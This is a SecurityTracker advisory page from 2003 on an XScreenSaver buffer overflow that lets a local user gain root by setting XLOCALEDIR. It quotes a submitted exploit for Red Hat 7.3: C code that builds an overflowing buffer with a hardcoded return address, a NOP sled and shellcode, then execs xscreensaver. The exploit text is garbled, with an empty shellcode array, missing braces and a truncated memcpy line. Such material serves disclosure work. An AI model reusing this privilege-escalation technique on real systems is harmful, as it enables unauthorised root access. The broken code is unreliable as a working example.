Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   XScreenSaver Vendors:   Zawinski, Jamie
XScreenSaver Buffer Overflow May Let Local Users Obtain Root Privileges
SecurityTracker Alert ID:  1006235
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 7 2003
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): Presumed to be 4.08 and prior versions [but that was not stated in the report]
Description:   A buffer overflow vulnerability was reported in XScreenSaver. A local user may be able to obtain root privileges on the system.

It is reported that a local user can set the XLOCALEDIR environment variable to a specially crafted value and then run XScreenSaver to cause arbitrary code to be executed with root privileges.

Impact:   A local user can cause arbitrary code to be executed with root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents

Subject:  xscreensaver exploit for Redhat 7.3

I think you don't need other comments:

** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
** deka is leet brother, thank you :>
** MAIL:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0xbfffdf20 //change it if u need

char shellcode[] =

int main()
        char buf[4076];
        unsigned long retaddr = RETADDR;

        memset(buf, 0x0, 4076);
        memset(buf, 0x41, 4072);
        memcpy(buf+2076, &retaddr, 0x4);
        setenv("XLOCALEDIR", buf, 1);
        memset(buf, 0x90, 4072);
        memcpy((buf+4072-strlen(shellcode)), shellcode, strlen
        setenv("HAXHAX", buf, 1);
        execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC